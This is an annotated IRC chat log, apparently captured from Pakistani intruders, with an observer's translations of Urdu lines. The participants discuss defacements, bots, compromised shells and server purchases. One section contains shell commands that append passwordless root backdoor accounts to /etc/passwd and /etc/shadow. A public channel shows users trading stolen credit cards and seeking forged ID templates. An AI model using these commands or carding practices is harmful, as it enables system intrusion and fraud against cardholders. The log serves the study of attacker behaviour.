      :J4n3! :that is for first module i think
      :D1ck! :oh
      :D1ck! :*sigh*
      :D1ck! :*sigh*
      :D1ck! :www.example.com
      :D1ck! :hahaha
      :J4n3! :ok sent :)
      :D1ck! :www.example.com
      :D1ck! :all indian ns
      :D1ck! :lol
      :D1ck! :thx
      :J4n3! :wow
      :J4n3! :kool
      :J4n3! :yaar ye defacement ab tight hogee
      
      dude this defacement will now become tight.
      
      :D1ck! :yep
      :D1ck! :so sup?
      :D1ck! :naveeed ko example ka pata laga?
      
      has naveed figured out about example?
      
      :D1ck! :haha
      :J4n3! :yup
      :J4n3! :bataya mainay
      
      yup, i had told him
      
      :D1ck! :oye
      :D1ck! :where did u send
      :D1ck! :dynamic@example.org?
      :J4n3! :both
      :D1ck! :k dint get it yet /
      :D1ck! ::/
      :Sp07! :.say a
      :Sp07! :dos help
      :Sp07! :.
      :D1ck! :=)
      :D1ck! :i had a bot
      :D1ck! :with uptime of 90 days
      :D1ck! :but on fine morning
      :D1ck! :i was sitting
      :D1ck! :and he/she pinged
      :D1ck! :and never came back ):
      :Sp07! :sup
      :Sp07! :[Sp07@raptorshells Sp07]$ uptime
      :Sp07! :  9:23pm  up 103 days,  8:37,  1 user,  load average: 1.00, 1.00, 1.00  
      :Sp07! :my friends shell
      :D1ck! :thats nothing dude
      :D1ck! :dude
      :D1ck! :i has a box at netkonnect
      :D1ck! :uptime ws 630 days
      :D1ck! :thats like 2 years
      :Sp07! :heh
      :D1ck! :heh
      :D1ck! :dude
      :D1ck! :dis
      :D1ck! :look for 8.1.2 overflow for me pls
      :D1ck! :THANKS
      :Sp07! :?
      :J4n3! :.msg |sanam| Sanammmmmmmmmm :)
      PRIVMSG |sanam| :Sanammmmmmmmmm :)
      :J4n3! :.join #d4v3
      :J4n3
      :J4n3
      :|sanam|
      :J4n3
      :J4n3
      :|sanam|
      
      are these all
      
      :|sanam|
      
      your bots?
      :J4n3
      
      yes all these are mine :)
      
      :J4n3
      
      these are too few
      
      :J4n3
      
      all the other poor bots are down
      
      :J4n3
      :J4n3
      
      awww... has it gone this far?
      
      :|sanam|
      
      who?
      
      :|sanam|
      
      who?
      
      :J4n3
      
      you and who?
      
      :|sanam|
      :|sanam|
      :J4n3
      
      sir....
      
      :J4n3
      
      express your desire
      
      :|sanam|
      
      you keep one for pinging
      
      :J4n3
      
      ok as you wish master
      
      :J4n3
      
      you shall receive one for pinging by tomorrow
      
      :|sanam|
      
      -=-
      
      Day 12 June 15
      
      :|S4n4m| :tum aisey hi bolna
      
      Just keep on saying like this
      
      :|S4n4m| :karna kuch nahi
      
      dont do anything
      
      :J4n3 :ye baath hai ?
      
      is that the deal?
      
      :|S4n4m| :han
      
      yes
      
      :|S4n4m| :yeh bat hay
      
      that is the deal
      
      :J4n3 :ping bot aaraha hai
      
      the ping bot is coming
      
      :|S4n4m| :instooooooooooooooooooooo
      :|S4n4m| ::)
      :|S4n4m| :karachi mey aooo
      
      come to karachi
      
      :J4n3 :ok bot aagaya
      
      ok the bot is here
      
      :J4n3 :d3s|r3 hai uska nick
      
      it's nick is d3s|r3
      
      :J4n3 :ab main channel par tyep karo ping me
      
      now type in the main channel in ping (Note:: dont know what it translates to)
      
      :J4n3 :<d3s|r3> PiNG THiNGiE - hiall's ping reply took 13 seconds
      :|S4n4m| :hmmm
      :|S4n4m| :tahnks
      :J4n3 :dekha ?
      
      saw that?
      
      :J4n3 :ab khush ?
      
      now are you happy?
      
      :|S4n4m| :han
      
      yes
      
      :|S4n4m| :kush
      
      happy
      
      :J4n3 :bus thum khush raho :)
      
      that's all ... keep staying happy :)
      
      :|S4n4m| :wah
      
      cool
      
      :|S4n4m| :kya bat hay app ki
      
      what shall i say about you
      
      :|S4n4m| :wasey
      :|S4n4m| :mey ney ek bandha rakh leeya hay
      
      i have kept one system for myself
      
      :|S4n4m| :ping key leyya
      
      for pinging
      
      :J4n3 :thumara bandaa 24 hour nahin betay gas
      
      your system wont be for 24 hours (Note:: again i am having difficulty translating - grammar issues in urdu
      
      :J4n3 :mera bot hoga
      
      my bot will
      
      :|S4n4m| :hmmmmmmmmmm
      :|S4n4m| :instoo
      :|S4n4m| :zara 5 min key leyee
      
      for a little bit... 5 mins
      
      :|S4n4m| :karachi channel per
      
      on karachi channel
      
      :|S4n4m| :flori ka interview ley loo
      
      take flori's interview
      
      :|S4n4m| :mey ney appoint kya hay
      
      i have appointed (him/her?)
      
      :J4n3 :hahaha nahin thum khud hee laylo
      
      yes yes, but take it yourself (the interview)
      
      :|S4n4m| :kyon
      
      why?
      
      :|S4n4m| :tum yahn key op hoo
      
      you are the op here
      
      :|S4n4m| :admintration mey hoo
      
      i am in administration
      
      :J4n3 :op thum oh main co-founder hon
      
      you are the op, i am the co-founder
      
      :J4n3 :aaayee meraa dil......chua kay lagyeeee...churanay wali meri qaatil
      
      ohhh.... she stole my heart
      
      :|S4n4m| :han wohi hii
      
      yes, her
      
      :|S4n4m| :hello
      :|S4n4m| :kya hoa
      
      what happened?
      
      :J4n3 :wait
      :J4n3 :.up
      :J4n3 :.op netra
      :J4n3 :.op Ott0
      :Dew :Hey J4n3 u there ?
      :J4n3 :.host add J4n3 *
      :J4n3 :.up
      :J4n3 :OngHome esay $uptime
      :D1ck :J4n3 
      :D1ck :i`m getting my own server;)
      :D1ck :J4n3 
      :D1ck :J4n3 
      :J4n3 :D1ck
      :J4n3 :i'm here
      :D1ck :hehe
      :D1ck :J4n3 
      :J4n3 :hehe
      :J4n3 :D1ck
      :D1ck :oye give me those commands for linux password adding and sun adding re ro re r i gave u
      :D1ck ::P
      :D1ck :i lost mine
      :J4n3 :wait
      :D1ck :and i dont wana make again
      :J4n3 :cp /etc/passwd /etc/.tp;
      :J4n3 :echo "ro::99999::::::" >> /etc/shadow;
      :J4n3 :echo "r::99999::::::" >> /etc/shadow;
      :J4n3 :echo "ro:x:500:1000::/:/bin/bash" >> /etc/passwd;
      :J4n3 :echo "r:x:0:0::/:/bin/bash" >> /etc/passwd;
      :J4n3 :cp /etc/shadow /etc/.ts;
      :D1ck :k
      :J4n3 ::p
      :D1ck :and suhn
      :D1ck :?
      :D1ck :sun
      :D1ck :?
      :J4n3 :wait
      :D1ck :gimme sun tew
      :D1ck :k
      :J4n3 :cp /etc/passwd /etc/.tp;
      :J4n3 :echo "re::6445::::::" >> /etc/shadow;
      :J4n3 :echo "r::10891::::::" >> /etc/shadow;
      :J4n3 :echo "re:x:500:1000:daemon:/:/sbin/sh" >> /etc/passwd;
      :J4n3 :echo "r:x:0:0:User:/:/sbin/sh" >> /etc/passwd;
      :J4n3 :cp /etc/shadow /etc/.ts;
      :D1ck :thx
      :J4n3 :np :p
      :D1ck :oye
      :D1ck :me getting a box
      :D1ck :T+3
      :D1ck :T3
      :J4n3 :wow
      :J4n3 :kewl
      :D1ck :where should i get?
      :D1ck :where is j0e getting
      :D1ck :d4v3 i want the folling domains
      :J4n3 :folling ?
      
      (Note:: misspelt "following")
      
      :D1ck example.org
      :J4n3 :j0e say contact nahi huwa called him 2 times
      
      j0e said there has been no contact ... called him 2 times
      
      :D1ck :wetcunts.net
      :J4n3 :example hmm
      :J4n3 :mil jayega agar register nahi huwa hai tho
      
      we will get it if it has not been registered
      
      :D1ck :undefined.net
      :D1ck :and kewl ones
      :D1ck :but not one's that end with zzz
      :D1ck :like dreamzzz.net
      :D1ck :etc
      :D1ck :eeet.org
      :D1ck :eeet.net
      :D1ck :oye
      :D1ck :how much j0e paid
      :D1ck :and what server?
      :J4n3 :he paid 250 $
      :J4n3 :from example.net
      :D1ck :kewl
      :D1ck :for a T3?
      :J4n3 :and yeah example.org  and com net all available :p
      :J4n3 :T1 i think
      :D1ck :kewl
      :D1ck :get me please
      :D1ck :oh
      :J4n3 :yaar CC :(
      :J4n3 :no CC right now 
      :J4n3 :yaar u have that bind weapon why dont u hit a big shoping site and take cc's ?
      
      (Note:: here's where they hatch the idea of stealing CCs)
      
      :D1ck :yep
      :D1ck :oki
      :D1ck : welp why dont we all hang in 
      :D1ck :it was my channel and i think ti still is
      :J4n3 :abay yaar sub fraud hotha hai wahan par
      
      hey dude, a lot of fraud goes on there
      
      :J4n3 :their CC's do not work
      :D1ck :hehe
      :J4n3 :bauth try kiya hai undernet and effnet par
      
      tried a lot on undernet and effnet
      
      :D1ck :k
      :D1ck :heh k
      :D1ck :<shellad:#shellz> DIGITALINET offers quality web hosting staring at 6$ a
      :D1ck :                  month. Signup for webhosting with digitalinet and get your
      :D1ck :                  domain for 11$ a year
      :D1ck :                  information.
      :D1ck :i`ll buy 2 legit domains there
      :J4n3 :haha i had a shell from there
      :D1ck :kewl
      :J4n3 :they closed shell service now 
      :J4n3 :adult web hosting :p
      :D1ck :lol
      :J4n3 :service achee thee buree nahin thee
      
      the service was good, not bad at all
      
      :D1ck :haha
      :J4n3 :oye sex time
      :J4n3 :brb
      :J4n3 :br
      :J4n3 :bbl
      :J4n3 :shayed so gaya
      
      seems like he's gone to sleep
      
      :D1ck :ahahahha
      :J4n3 :hehe
      :J4n3 :g0ne
      :D1ck :.join 
      :L4stly :Does anyone here have any working Credit Card numbers with full details ?
      :L4stly :Does anyone here have any working Credit Card numbers with full details ?
      :L4stly :Does anyone here have any working Credit Card numbers with full details ?
      :L4stly :Does anyone here have any working Credit Card numbers with full details ?
      :L4stly :Does anyone here have any working Credit Card numbers with full details ?
      :L4stly :Does anyone here have any working Credit Card numbers with full details ?
      :^w1nX^ :cc
      :^w1nX^ :cc
      :^w1nX^ :sleepin chann
      :^w1nX^ :trade
      :^w1nX^ :sleepin chann
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :trade
      :atlanta.ga.us.undernet.org 005 spitz SILENCE=15 WHOX WALLCHOPS USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=15 MAXBANS=30 NICKLEN=9 TOPICLEN=160 KICKLEN=160 MAP :are supported by this server
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :nirvana19 :e cinevA de aici si pe rocarding?
      
      (Note:: definitely not urdu here
      
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :Bl4ck_ :not again
      :Bl4ck_ :-up
      :nirvana19 :I buy stuff
      :SLaZz :who wants to trade cc's ??
      :nirvana19 :gfnbfg
      :nirvana19 :someone from romania?
      :savantul :yes
      :_Mephisto :multi
      :_Mephisto ::)
      :nirvana19 :aveti ceva marfa?
      
      (Note:: ??)
      
      :nirvana19 :cumpar
      :_CardMan_ :re ppl
      :Bl4ck_ :arrrrrrrrrrrrrrrrr
      :Bl4ck_ :-up
      :_CardMan_ :what is new ?
      :Bl4ck_ :shitttttttttttttt
      :_CardMan_ :stupid bots
      :Bl4ck_ :-up
      :Bl4ck_ :-up
      :_CardMan_ :this is fun....
      :Bl4ck_ :Omblad0n up
      :Bl4ck_ :Omblad0n op
      :Bl4ck_ ::>>
      :Bl4ck_ :arrrrrr
      :_CardMan_ :Bl4ck_....do u know what u r doing ?
      :Bl4ck_ :dunoo
      :_CardMan_ :i saw....
      :_CardMan_ :so ... any romanian people here ?
      :bug____ :ops
      :_CardMan_ :bug____...whats up ?
      :savantul :lots
      :bug____ :nimic man
      :_CardMan_ :ok...
      :bug____ :I need cc
      :bug____ :lol
      :_Mephisto :me too
      :_CardMan_ :pai care e din bucale si are niste cc-uri bune (NU bunicele, sau extrapolate) sa initieze o privata repede....
      
      (Note:: ??)
      
      :nirvana19 :da o gramada de romanian pepole pe aici
      
      (Note:: ??)
      
      :bug____ :1 cc
      :bug____ :1
      :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede....
      :_CardMan_ :care esti pe kappa (IP: 192.168.254.95
      :_CardMan_ :DNS: dialup-56k-95.example.xx
      :_CardMan_ :si dai cu scanarea ?
      :nirvana19 :de unde pot sa fac rost de Legion 2.1
      :_Mephisto :de la mine
      :_CardMan_ :nirvana19.... LOLZ... nu stiai ca are back door mah ?
      :nirvana19 :poti sa mi-l dai?
      :dlotos33 :Is there any Romania friends?
      :bug____ :nope
      :dlotos33 :Is there any Romania friends?
      :_CardMan_ :a lots 
      :Co0lWoRx :any1 here wanna earn +v, msg me
      :Co0lWoRx :any1 here wanna earn +v, msg me
      :v|Adu :re 
      :v|Adu ::)
      :Co0lWoRx :ACTION any1 here wanna earn +v, msg me
      :v|Adu :anybody need a drop place ?
      :nirvana19 :de unde esti ma vladule?
      :_CardMan_ :v|Adu.... lasa-te de meserie ....
      :v|Adu ::)))))))
      :v|Adu :cardman 
      :v|Adu ::)
      :v|Adu :hahahahah
      :v|Adu ::)
      :_CardMan_ :suck it 
      
      (Note:: ?? - all this is either romanian or some other language)
      
      :Co0lWoRx :ACTION any1 here wanna earn +v, msg me
      :nirvana19 :sorry
      :Co0lWoRx :ok
      :Co0lWoRx :np
      :xroach :anybody have any driver license template ? 
      :xroach :anybody have any driver license templates ? 
      :bug____ :u can save my ass with  1 cc
      :xroach :actually any good templates would be nice
      :bug____ :I got some sites
      :v|Adu :re 
      :Co0lWoRks :ACTION any1 wanna earn +v in 
      :Co0lWoRks :ACTION any1 wanna earn a virgin card, msg me now
      :Co0lWoRks :ill bbl, since no one wants anything here
      :Bl4ck_ :-up
      :Bl4ck_ :?
      :Bl4ck_ :soory
      :Bl4ck_ :I`ll go
      :dlotos33 :anyone have CC?
      :s1z1f :yes
      :xroach :anyone have or know where i could get license templates or any templates for mag cards ? 
      :s1z1f :do enyone have cc?
      :dlotos33 :Does any one speak germany?
      :_CardMan_ :do not think so ...
      :2red :i speak some german
      :2red :why?
      :dlotos33 :What means "ORT" at GERMANY?
      :2red :city?
      :dlotos33 :thank you ,my friend
      :MaTiX_00 :hello
      :MaTiX_00 :anyone got a proxy for me to use?
      :dlotos33 :yes
      :SpRiTe^^^ :HI
      :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede....
      :SpRiTe^^^ : xxxx xxxx xxxx xxxx
      :SpRiTe^^^ : xxxx xxxx xxxx xxxx
      :SpRiTe^^^ : xxxx xxxx xxxx xxxx
      :SpRiTe^^^ : xxxx xxxx xxxx xxxx
      :SpRiTe^^^ : xxxx xxxx xxxx xxxx
      :SpRiTe^^^ : xxxx xxxx xxxx xxxx
      :SpRiTe^^^ :4,4 xxxx xxxx xxxx xxxx
      :SpRiTe^^^ :0,4 xxxx xxxx xxxx xxxx
      :SpRiTe^^^ :4,4 xxxx xxxx xxxx xxxx
      :SpRiTe^^^ :0,0 1,1 xxxx xxxx xxxx xxxx
      :kurky :Any GOOOOOOOD carders here? msg me
      :kurky :Anyone here got a UK cc??? Msg me
      :kurky :Anyone here got a UK cc??? Msg me for trade for Virgin VISA
      :][VaMpIrE :hi
      :][VaMpIrE :wanna trade?
      :kurky :Anyone here got a UK cc??? Msg me for trade for Virgin VISA
      :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede....
      :_CardMan_ :m4r1n4ru...salve mah 
      :m4r1n4ru :-op
      :xroach :anybody have any dl templates ? cia/fbi/nsa would be cool too
      :s1z1f :do enybody have cc?
      :kurky :Anyone here got a UK cc??? Msg me for trade for Virgin VISA
      :s1z1f :do enybody have cc?
      :[SK]Kane :care aveti un proxy bun de www?
      :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede....
      :SpRiTe^^^ :H
      :SpRiTe^^^ :ok
      :m4r1n4ru :-op
      :s1z1f :do enybody have cc?
      :s1z1f :do enybody have cc?
      :dariuss :am yo 1000
      :s1z1f :do enybody have cc?
      :natedogg :i do..
      :s1z1f :pls give it to me
      :natedogg :trade...
      :natedogg :mgs me..
      :s1z1f :pls give it to me
      :s1z1f :do enybody have cc?
      :natedogg :sizif ---------------banned#no more trade kind.....
      :s1z1f :do enybody have cc?
      :s1z1f :pls give it to me
      :s1z1f :do enybody have cc?
      :pimpg :yeah
      :pimpg :if you would like one you have to send me one first
      :pimpg :then if it approves
      :s1z1f :ok
      :pimpg :i will send one to you
      :pimpg :sound good
      :pimpg :pm me if you would like me 2
      :D1ck :Tota1KaaS join #delusion
      :D1ck :Tota1KaaS say #delusion Ok, NOW introducing the the First Shell hosting company in pakitan, with excellent domains, Vhosts ip, bots, on a T3 HUB, coming soon.
      :D1ck :Tota1KaaS say #delusion If interested say on main, and one of the admins will message :)
      :D1ck :Tota1KaaS say #delusion Ok, NOW introducing the the First Shell hosting company in pakitan, with excellent domains, Vhosts ip, bots, on a T3 HUB, coming soon.
      :D1ck :Tota1KaaS say #delusion If interested say on main, and one of the admins will message :)
      :dariuss :Bl4ck_-))
      :Bl4ck_ :se man
      :s1z1f :*** pimpg (~ricky@exo01-ca.example.net) has joined 
      :s1z1f :*** Retrieving 
      :s1z1f :<s1z1f> do enybody have cc?
      :s1z1f :<s1z1f> pls give it to me
      :s1z1f :*** Retrieving 
      :s1z1f :*** natedogg has quit IRC (Signed off)
      :s1z1f :<s1z1f> do enybody have cc?
      :s1z1f :<pimpg> yeah
      :s1z1f :<pimpg> if you would like one you have to send me one first
      :s1z1f :<pimpg> then if it approves
      :Ghici :re ppl
      :pimpg :hello
      :pimpg :would anyone like to trade, i dont go first
      :D1ck :D4v3
      :D1ck :WHEN BACK MSG ME
      :s1z1f :do enybody have cc?
      :dariuss :ACTION c ya
      :m4r1n4ru :Away
      :m4r1n4ru :I have Returned.
      :m4r1n4ru :Away
      :s1z1f :do enybody have cc?
      :m4r1n4ru :Away
      :Bon_Jovi :m4r1n4ru 
      :s1z1f :do enybody have cc?
      :Bon_Jovi :yep
      :m4r1n4ru :Away
      :m4r1n4ru :Away
      :s1z1f :do enybody have cc?
      :m4r1n4ru :Away
      :D1ck :hey J4n3
      :J4n3 :what's new :p ?
      :D1ck :server
      :D1ck :buying
      :D1ck :but what did j0e say
      :D1ck :which is good one?
      :J4n3 :buying ? confirmed ?
      :D1ck :i got 10 domains
      
      (Note:: at this point i guess they have closed the deal with the previous CCs)
      
      :D1ck ::P
      :D1ck :freind bought them
      :D1ck :hreh
      :D1ck :yup
      :J4n3 :usay khud sahi nahi patha usnay sirf example try kiya hai aur wo sahi nahi laga usay
      
      he himself doesnt know really, he just tried example and it didnt look all right to him
      
      :D1ck :example.net sux?
      :D1ck :oh
      :J4n3 :great  
      :D1ck :(@J4n3): great
      :D1ck :?
      :J4n3 :haha u said friend already bought it ?
      :D1ck :domains
      :D1ck ::)
      :J4n3 :oh
      :J4n3 :but from where u planning to buy ?
      :D1ck :kuch samhaj nahi aa rahi
      
      cant understand anything
      
      :D1ck :where should i buy
      :D1ck :Server Space: Single Server
      :D1ck :IP Numbers: 30
      :D1ck :Bandwidth: 50 Gigs
      :D1ck :Services: Level 1 (Included)
      :D1ck :Monitor: 24/7 Network Monitoring (Included)
      :D1ck :--------------------------------------------------------------------------------
      :D1ck :Payment Plan: $2,182.80 paid Annually
      :D1ck :Setup Fee: $100.00
      :D1ck :--------------------------------------------------------------------------------
      :D1ck :Total Startup: $2,282.80
      :D1ck :SkyNetWEB Ltd.
      :D1ck :3500 Boston St.
      :D1ck :Baltimore Maryland, 21224
      :D1ck :Phone: 410.563.6384
      :D1ck :Fax: 410.563.5457
      :D1ck :Server Space: Single Server
      :D1ck :IP Numbers: 30
      :D1ck :Bandwidth: 50 Gigs
      :J4n3 :2,828 ?
      :D1ck :Services: Level 1 (Included)
      :D1ck :Monitor: 24/7 Network Monitoring (Included)
      :D1ck :--------------------------------------------------------------------------------
      :D1ck :Payment Plan: $2,182.80 paid Annually
      :D1ck :Setup Fee: $100.00
      :D1ck :--------------------------------------------------------------------------------
      :D1ck :Total Startup: $2,282.80
      :D1ck :SkyNetWEB Ltd.
      :D1ck :3500 Boston St.
      :D1ck :Baltimore Maryland, 21224
      :D1ck :Phone: 410.563.6384
      :D1ck :Fax: 410.563.5457
      :D1ck :yeah
      :D1ck :per year
      :D1ck ::(?
      :D1ck :or :?
      :J4n3 :but he got it about 800 $ total i think with all system p2 400 64 mb ram and 8.4 gb hd
      :D1ck ::)?
      :m4r1n4ru :Away
      :D1ck :but
      :D1ck :that was one month
      :D1ck :remmeber?
      :J4n3 :hmm
      :J4n3 :u mean thats all for one year ?
      :J4n3 :and u gonna pay for it ?
      :D1ck :tell me
      :D1ck :what should i do?
      :D1ck :i`m confewsed
      
      (Note:: you man "confused"... kiddie)
      
      :J4n3 :yaar aaj raath tak wait karlo
      
      dude, wait till tonight
      
      :J4n3 :let me ask some more ppl
      :D1ck :oki
      :J4n3 :teeek haina ?
      
      it's ok with you, right?
      
      :J4n3 :i'll ask miller too
      :D1ck :oki
      :D1ck :ok
      :D1ck :my budget is 170-200/month
      :J4n3 :hmm k
      :D1ck :>Domain Name 1....: example.com
      :D1ck :>Domain Name 2....: example.com
      :D1ck :>Domain Name 3....: example.com
      :D1ck :>Domain Name 4....: example.com
      :D1ck :>Domain Name 5....: example.com
      :D1ck :>Domain Name 6....: example.com
      :D1ck :>Domain Name 7....: example.com
      :D1ck :>Domain Name 8....: example.com
      :D1ck :>Domain Name 9....: example.com
      :D1ck :>Domain Name 10...: example.com
      :D1ck :>Total............: $649.50
      :J4n3 :oh already registered ?
      :D1ck :yup
      :J4n3 :how many years ?
      :D1ck :1
      :J4n3 :thats expensive
      :J4n3 :wait
      :D1ck :who cares
      :D1ck :its cared
      :J4n3 :let me check
      :J4n3 :oh
      :J4n3 :then its ok but wait
      :D1ck :oki
      :D1ck :(Sephirot): I need help , SOme one can help me
      :J4n3 :heh
      :D1ck :=p
      :J4n3 :oye
      :D1ck :?
      :J4n3 :u could got those 10 domain for 2 years at 300 $   and for 5 years at 750 $
      :D1ck :kewl
      :D1ck :from where?
      :J4n3 :dotster
      :D1ck :dotster.com
      :D1ck :?
      :J4n3 :1 year: $15  2 year: $30 
      :J4n3 :5 year: $75 10 year: $150 
      :J4n3 ::)
      :J4n3 :yeah
      :D1ck :cool
      :D1ck ::P
      :J4n3 :we'll get more from there
      :D1ck :oki
      :D1ck :;)
      :D1ck :yaar
      
      dude
      
      :D1ck :i want the server
      :D1ck :b4d
      :D1ck :kuch samhaj nahin aa rahi
      
      cant understand anything
      
      :J4n3 :haha jald baazi math karo 
      
      haha, dont make haste
      
      :D1ck :oye who could make a kewl kewl kewl webpage for webhosting and shell accounts?
      :m4r1n4ru :Away
      :J4n3 :coz u going to pay from ur pocket
      :D1ck :lol oki
      :J4n3 :zara ache thara maaloom karnay do
      
      let's locate some good chap
      
      :D1ck :ok;)
      :J4n3 :page design karnay ka masla nahi wo hojayega dont worry
      
      dont worry about the page design problem, it shall be done
      
      :D1ck :oki kewl
      :D1ck ::)
      :D1ck :oye
      :J4n3 :i'm gonna open a cosmetics shop at tariq road :p
      :D1ck :1pani nay apna server liya tha or rent?
      
      has j0e bought the server or rented it?
      
      (Note:: aek in hindi/urdu - pronounce: ache... means one. so 1pani would be j0e that they
      always refer to)
      
      :J4n3 :yea ?
      :J4n3 :liya tha
      
      had bought it
      
      :D1ck :kewl hehe
      :D1ck ::/
      :D1ck ::/
      :J4n3 :agar thum kaho tho j0e kee baath karwatha hon thum say
      
      if you say so, i can tell you j0e's deal
      
      :D1ck :oh
      :J4n3 :usay kahonga thumain call karday
      
      i will ask him to call you
      
      :J4n3 :ok ?
      :D1ck :ok
      :D1ck :sure
      :D1ck ::)
      :D1ck :but after 9
      :D1ck :but after 9 pm
      :J4n3 :teeek hai phir khud hee pooch lena sub kuch
      
      ok then just ask him everything yourself
      
      :D1ck :coz i`ll be sleeping
      :J4n3 :hmm ok
      :D1ck :k;/
      :D1ck :;/
      :J4n3 ::)
      :J4n3 :tariq road , cosmetic shop, kewl kewl bachiyan *wink*
      
      bachiyan = chicks
      
      :D1ck :lol
      :D1ck :hahahaha
      :J4n3 :hehe yeah
      :J4n3 :have u seen that new building dolmen mall ?
      :D1ck ::P
      :D1ck :nop
      :m4r1n4ru :Away
      :J4n3 :hmm phir dekhna , its kewl and most beautiful market in karachi
      
      hmmm then take a look at it, it's cool and most beautiful market in karachi
      
      :J4n3 :yaar give me a kewl host , aisa jis main psybnc chalaon aur crash na ho, meray ziyad thar roots main make command work nahi kartha :(
      
      dude, give me a cool host, such that if we run psybnc on it, it doesnt crash.
      
      (Note:: i am having problems with some urdu words, but the word-by-word translation for
      the rest of it is:
      
      meray = mine
      main = in
      nahi = doesnt
      kartha = happens
      
      the last part is.."make command doesnt work in this")
      
      :D1ck ::))
      :D1ck :oh
      :D1ck :i will send u psybnc-compiled
      :D1ck :when i boot
      :D1ck ::)
      :J4n3 :oh then its kewl :)
      :J4n3 :tight
      :J4n3 :for sparc na ?
      :D1ck :yeps
      :J4n3 :great waiting ...
      :D1ck :abey abhi ruk heheheh
      
      hey wait for now heheheh
      
      :D1ck :i am tlking to the person for col
      :D1ck ::P
      :D1ck ::pPpp
      :J4n3 :haha ruka huwa hon jub boot karo tho daydena hehe
      
      haha, i am waiting. when you boot then give it up hehe
      
      :D1ck :*** Joins: tOpDaWgGy (KoRn@spc-isp-tor-58-18-419.example.xx)
      :D1ck :(tOpDaWgGy): dAwGgGYY
      :D1ck :(tOpDaWgGy): chinii
      :D1ck :(tOpDaWgGy): jApAniIii
      :D1ck :(@D1ck): hEYyYYyYy
      :D1ck :(@D1ck): dOgYY
      :D1ck :hehehe
      :J4n3 :hehehe
      :D1ck ::)
      :m4r1n4ru :Away
      :D1ck :oye
      :D1ck :read
      :D1ck :http://www.example.net/Contracts/CIT-Colocation%20Agreement.html
      :D1ck :tell me i it have some clawa
      :D1ck :tell me i it have some claws
      :J4n3 :wait
      :D1ck :k
      :J4n3 :errror araha hai
      
      there's an error
      
      :D1ck :works for me
      :J4n3 :hmm nope not working let me try on netscape
      :D1ck :k
      :D1ck :(tOpDaWgGy): shAe.. dAwG bhai
      :J4n3 :Plan A:  20 gigs/month [64kbps avg.], * up to 30 IP addresses  ($150.00
      :J4n3 :      per month)
      :D1ck :is ko doggy kay ilawa
      
      this one as an alternative to doggy
      
      :J4n3 :thats what u want to buy ?
      :D1ck :nope
      :D1ck :40 gig
      :D1ck :256 ips
      :J4n3 :Plan B:  40 gigs/month [128kbps avg], * up to 62 IP addresses  ($250.00
      :J4n3 :      per month)
      :J4n3 :its 62 in 40 gigs
      :D1ck :yep but he sed he will allow 256 if not needed
      :D1ck :needded
      :J4n3 :oh then its okay package is kool
      :D1ck :kewl
      :J4n3 :.msg G_u_Y__  abay oye chichoray mmoooon band kar apna 
      
      hey you squirt, shut your mouth
      
      PRIVMSG G_u_Y__ :abay oye chichoray mmoooon band kar apna 
      
      hey you squirt, shut your mouth
      
      :D1ck :best firwalling and dos protection in town
      :D1ck :lol
      :J4n3 :hmm kewl
      :J4n3 :oye add my this host to bots plz :)
      :m4r1n4ru :Away
      :D1ck :sure
      :D1ck :whats yure ip
      :D1ck :/whois J4n3
      :J4n3 :*
      :D1ck :onghome.com
      :D1ck :oki
      :D1ck :.host add J4n3 *
      :D1ck :brb
      :J4n3 :thanx :)
      :m4r1n4ru :Away
      :J4n3 :.join #karachi
      :m0sTwAnTdpinG
      :G_u_Y__
      
      you and i will get along well
      
      :J4n3 :.msg #karachi GUY ullooo kay pattay moon band rakko apna
      
      you stupid chaps, keep your mouth shut
      
      :sawera
      
      hey ask those who are about to die what their last wish is
      
      :G_u_Y__
      :J4n3 :oops
      :J4n3 : ?
      :J4n3 :say A?
      :G_u_Y__
      
      dearest
      
      :J4n3 :.say #karachi GUY Ullooo kay pattay mooon band rakko apna :p
      
      you stupid chaps, keep your mouth shut
      
      :J4n3 :.part #karachi
      :m4r1n4ru :Away
      :D1ck :J4n3
      :D1ck :my dadi's bro died today, so my dad is off to lahore
      :D1ck :shit
      :D1ck :ab this kaam will latkofy
      
      now this work will be left hanging
      
      :J4n3 :oh
      :J4n3 :Inna lillaaye wa inna ilayae raajioon
      
      (Note:: some prayer to allah it seems)
      
      :J4n3 :very sorry
      :D1ck ::p
      :D1ck :yep he was 85, this is life, ppl come and go
      :D1ck :hehe
      :D1ck :its ok
      :D1ck :;)
      :J4n3 :oh
      :D1ck ::)
      :J4n3 :phir tho time tha jaanay ka unkay
      
      then it was time for him to go
      
      :J4n3 :i thought he was young
      :J4n3 ::p
      :D1ck :nop
      :D1ck :hehe
      :J4n3 :hehe
      :D1ck ::)
      :D1ck :oye
      :D1ck :what i say is
      :D1ck :hm
      :J4n3 :is ?
      :D1ck :chalo time mil gaye ga
      
      come we shall get the time
      
      :D1ck :now we can investiagte
      :J4n3 :yeah yeah
      :J4n3 ::)
      :D1ck :(g|nger`): well
      :D1ck :(g|nger`): i have like 20
      :D1ck :(g|nger`): example.org example.org example.com example.net example.com example.com example.org will-fuck-up-example.com example.com example.com example.com example.com example.com
      :D1ck :(g|nger`): plus others
      :D1ck :(g|nger`): you can have whatever vhosts you want
      :D1ck :kewl?
      :m4r1n4ru :Away
      :J4n3 :yeah kewl
      :D1ck :PHAT6
      :D1ck :;pp
      :J4n3 :if we have domains, we can have vhost of whatever we like
      :D1ck :yaar is it possibl that u can help me with wrebpage :P?
      :D1ck :i cant do alone, coz i have 0-webpage skilzl
      :D1ck :hehe
      :J4n3 :yeah yeah i'm with u always
      :J4n3 ::)
      :D1ck :iknowheh
      :J4n3 :dont feel ur self alone
      :D1ck :kool:)
      :D1ck :kleet
      :J4n3 ::)
      :D1ck :aur sunao
      
      so what else is new?
      
      :D1ck :what haWt
      :J4n3 :nutthin hot naveed nay chars maanga hai hehe
      
